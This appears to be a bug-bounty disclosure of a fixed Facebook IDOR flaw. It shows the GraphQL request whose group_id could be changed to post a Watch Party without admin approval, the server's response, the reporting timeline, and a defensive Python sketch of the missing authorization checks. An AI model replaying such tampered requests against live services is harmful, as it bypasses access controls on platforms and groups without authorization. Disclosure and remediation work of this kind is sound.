[Facebook] Bypass Admin approval for Watch Party

 

A group member was able to bypass post approvals and post a Watch Party.

POC -

The request goes to the following GraphQL endpoint -

=====================================================================

=====================================================================

POST /graphql

HOST: facebook.com

av=XXX&__user=XXX&__a=1&variables={"input":{"client_mutation_id":"2","actor_id":"XXX","composer_session_id":"f22386d2e87fd5e","creator_actor_id":"XXX","custom_name":null,"group_id":"XXX","video_ids":["XXX"]}}&doc_id=1910407048979275

=====================================================================

=====================================================================

In this request, the "group_id" value could be changed (IDOR).

The response would be -

=====================================================================

=====================================================================

{"data": {"group_living_room_create": {"client_mutation_id": "2","living_room": {"__typename": "LivingRoomSession","id": "XXXXX"}

=====================================================================

=====================================================================

The post will not appear on the group's discussion page. However, an attacker can invite the members of the group and send them the link to the post; members can open the link and attend the watch party.

Timeline -

Reported - Friday, June 22, 2018

Marked Duplicate - Friday, June 22, 2018

This is now fixed.
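
A sketch of the server-side checks this class of bypass calls for, added here as an example and not Facebook's code: the create path binds the actor to the session, authorizes against the group_id actually supplied, and holds the room as pending when the group requires post approval, while the read path refuses a pending room to ordinary members who follow a direct link. The Group and LivingRoom classes, the status values and the function names are assumptions; only the input field names come from the request above.

```python
from dataclasses import dataclass, field

# Hypothetical in-memory model; not Facebook's schema.
@dataclass
class Group:
    id: str
    members: set
    admins: set
    post_approval: bool
    rooms: dict = field(default_factory=dict)  # room id -> LivingRoom

@dataclass
class LivingRoom:
    id: str
    creator: str
    group_id: str
    status: str  # "PUBLISHED" or "PENDING_APPROVAL" (assumed values)

class Forbidden(Exception):
    pass

def create_living_room(groups, session_actor, inp):
    """Checks for a group_living_room_create-style mutation."""
    # Actor ids in the request body are client-controlled; bind them to the session.
    if inp["actor_id"] != session_actor or inp["creator_actor_id"] != session_actor:
        raise Forbidden("actor mismatch")
    # Authorize against the group_id actually supplied in the request.
    group = groups.get(inp["group_id"])
    if group is None or session_actor not in group.members:
        raise Forbidden("not a member of group")
    # Apply the group's approval setting on this path too, not only on normal posts.
    needs_review = group.post_approval and session_actor not in group.admins
    room = LivingRoom(
        id=f"room-{len(group.rooms) + 1}",
        creator=session_actor,
        group_id=group.id,
        status="PENDING_APPROVAL" if needs_review else "PUBLISHED",
    )
    group.rooms[room.id] = room
    return room

def can_view(groups, viewer, room):
    """Read-side check: a direct link must not expose a pending room."""
    group = groups[room.group_id]
    if viewer not in group.members:
        return False
    if room.status == "PENDING_APPROVAL":
        return viewer in group.admins or viewer == room.creator
    return True
```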